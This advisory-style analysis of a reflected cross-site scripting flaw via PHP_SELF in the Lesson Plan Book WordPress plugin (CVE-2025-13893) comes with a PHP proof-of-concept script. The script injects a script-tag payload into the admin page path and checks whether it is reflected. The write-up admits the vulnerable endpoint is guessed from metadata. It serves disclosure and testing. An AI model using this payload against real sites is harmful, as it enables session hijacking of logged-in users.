Atomic Edge analysis of CVE-2025-13893 (metadata-based):
This vulnerability is a reflected cross-site scripting (XSS) flaw in the Lesson Plan Book WordPress plugin, affecting all versions up to and including 1.3. The vulnerability stems from improper handling of the PHP_SELF server variable, allowing unauthenticated attackers to inject malicious scripts. The CVSS score of 6.1 indicates medium severity, with impacts on confidentiality and integrity but not availability.
Atomic Edge research identifies the root cause as insufficient sanitization and output escaping of the $_SERVER[‘PHP_SELF’] variable. The plugin likely echoes this variable directly into HTML output without proper escaping. This inference is based on the CWE-79 classification and the vulnerability description. Without source code, we cannot confirm the exact file or line number, but the pattern matches common WordPress plugin vulnerabilities where server variables are trusted implicitly.
Exploitation requires an attacker to craft a malicious URL containing a JavaScript payload within the PHP_SELF parameter context. The attacker must trick a victim into clicking the link. The payload executes in the victim’s browser within the context of the vulnerable plugin page. Atomic Edge analysis suggests the vulnerable endpoint is likely an administrative or front-end page that uses PHP_SELF for form actions or self-referencing links. A typical payload would be alert(document.domain) or similar JavaScript to steal session cookies.
Remediation requires proper output escaping of the PHP_SELF variable before echoing it into HTML. WordPress provides esc_url() or esc_attr() functions for this purpose. The plugin should also implement input validation, though PHP_SELF is a server-controlled variable. The fix must ensure all user-controllable data is escaped on output, following WordPress coding standards.
Successful exploitation allows attackers to execute arbitrary JavaScript in the victim’s browser. This can lead to session hijacking, administrative actions performed by logged-in users, or defacement of the WordPress site. The impact is limited to the user’s current session and permissions, but an administrator victim could lead to full site compromise.
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-13893 - Lesson Plan Book <= 1.3 - Reflected Cross-Site Scripting
<?php
/**
* Proof of Concept for CVE-2025-13893
* This script demonstrates reflected XSS via PHP_SELF in Lesson Plan Book plugin.
* Since exact vulnerable endpoint is unknown from metadata, this PoC targets a common pattern.
* Assumptions:
* 1. The plugin has a page that echoes $_SERVER['PHP_SELF'] without escaping.
* 2. The page is accessible via GET request.
* 3. The XSS triggers when the crafted URL is visited.
*/
$target_url = 'http://vulnerable-wordpress-site.com/wp-admin/admin.php?page=lesson-plan-book';
// XSS payload to demonstrate vulnerability
$payload = '"><script>alert(document.domain)</script>';
// Construct malicious URL by appending payload to path
$parsed = parse_url($target_url);
$path = $parsed['path'] ?? '/';
$path_with_payload = $path . $payload;
$exploit_url = $parsed['scheme'] . '://' . $parsed['host'] . $path_with_payload;
if (isset($parsed['query'])) {
$exploit_url .= '?' . $parsed['query'];
}
// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $exploit_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_USERAGENT, 'Atomic Edge PoC');
// Execute request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
// Check if payload appears in response (indicating potential XSS)
if (strpos($response, $payload) !== false) {
echo "[+] Potential XSS vulnerability detected.n";
echo "[+] Exploit URL: $exploit_urln";
echo "[+] Visit this URL in a browser to trigger the alert.n";
} else {
echo "[-] No obvious XSS reflection detected.n";
echo "[-] The vulnerable endpoint may differ from assumptions.n";
}
?>
